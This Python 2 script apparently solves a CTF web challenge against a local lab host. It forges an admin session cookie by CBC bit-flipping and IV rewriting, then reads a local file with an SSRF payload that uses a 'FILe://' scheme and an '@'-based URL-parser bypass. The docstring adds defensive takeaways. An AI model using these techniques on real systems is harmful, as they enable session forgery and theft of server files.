"""Walkthrough script for a CTF-style web challenge.

Python 2 syntax throughout (``print`` statements, ``urllib.unquote``,
``str`` used as a byte string), so it will not run unmodified on Python 3.

Flow, as visible below:
  1. log in with fixed credentials and read three cookies back from the
     Set-Cookie header;
  2. alter one byte of the ``user_info`` ciphertext and then derive a
     replacement ``key`` (IV) so that the first decrypted block equals a
     chosen PHP-serialized prefix -- the classic CBC bit-flipping pattern,
     which only works because the server (presumably) decrypts the cookie
     with no integrity check (no MAC / authenticated encryption);
  3. call a server endpoint that fetches a caller-supplied ``url``
     parameter and print what it returns.

Defensive takeaways: authenticate cookie ciphertext (HMAC / AEAD) instead
of bare CBC, and validate server-side fetch targets against an allow-list
of schemes and hosts after URL normalization rather than by substring.
"""
import urllib
import requests
import re
import base64

url = "http://0.0.0.0:20001/"
data = {
    "username": "1dmin",
    "password": "1231111",
    "submit": "Login"
}
r = requests.post(url=url, data=data)
# NOTE: shadows the builtin `list`; the Set-Cookie header is parsed
# positionally, so any change in cookie order on the server breaks the
# three index lookups below.
list = r.headers['Set-Cookie'].split(", ")
# [4:] presumably strips "key=", [10:] strips "user_info=" / "PHPSESSID="
# (lengths match the cookie names re-sent later) -- confirm against the
# actual header.
iv = urllib.unquote(list[1][4:])
cipher = base64.b64decode(urllib.unquote(list[2][10:]))
phpsessid = list[0].split(";")[0][10:]
# Split the raw ciphertext into 16-byte blocks (AES-sized; block cipher
# itself is not visible here).
block = []
for i in range(0, len(cipher), 16):
    block.append(cipher[i:i+16])
# XOR byte 9 of block 0 so that, after CBC decryption, the corresponding
# byte of block 1 flips from '1' to 'a'. Block 0's own plaintext becomes
# garbage, which the IV rewrite further down repairs.
replace = chr(ord(block[0][9]) ^ ord('1') ^ ord('a'))
block[0] = block[0][:9] + replace + block[0][10:]
iv = base64.b64decode(iv)
# Reassemble the modified blocks into one byte string (Py2 str).
cipher_new = ""
for i in range(0, len(block)):
    cipher_new += block[i]

# First probe with the tampered ciphertext and the original IV: the page
# is expected to echo the (now garbled) first block inside a <p> tag,
# base64-encoded.
cookie = {
    "PHPSESSID": phpsessid,
    "user_info": urllib.quote(base64.b64encode(cipher_new)),
    "key": urllib.quote(base64.b64encode(iv))
}
s = requests.get(url=url, cookies=cookie)
res_tr = r"<p>.*?</p>"
# m_tr[0] raises IndexError if the page contains no <p>…</p>; nothing
# here guards against that.
m_tr = re.findall(res_tr, s.content)
base = m_tr[0][3:-4]
plain = base64.b64decode(base)[:16]
# Desired plaintext for block 0: the start of a PHP serialized array.
want = 'a:2:{s:8:"userna'
# In CBC, P0 = D(C0) XOR IV, so a new IV of (P0_garbled XOR IV XOR want)
# makes block 0 decrypt to `want` without touching the ciphertext again.
first_16 = ''
for i in range(16):
    first_16 += chr(ord(plain[i]) ^ ord(iv[i]) ^ ord(want[i]))
newiv = first_16

# Second request: tampered ciphertext plus the recomputed IV, reusing the
# same PHPSESSID so the server-side session is what gets elevated.
cookie = {
    "PHPSESSID": phpsessid,
    "user_info": urllib.quote(base64.b64encode(cipher_new)),
    "key": urllib.quote(base64.b64encode(newiv))
}
k = requests.get(url=url, cookies=cookie)
# Endpoint that fetches a caller-controlled URL; the value is taken from
# the original write-up as-is. The mitigation on the server side is an
# allow-list of schemes/hosts applied after normalization.
url2 = url + 'mmman4g.php?url=FILe://@127.0.0.1:80@www.harmonyos.com/.//../../var/www/html/flag.php'
cookie = {
    "PHPSESSID": phpsessid
}

r = requests.get(url=url2, cookies=cookie)
# Pull the single-quoted blob ending in "}'" from the response body;
# again m_tr[0] is unguarded.
res_tr = r"'.*?}'"
m_tr = re.findall(res_tr, r.content)
print 'admin PHPSESSID:', phpsessid
print m_tr[0][1:-1]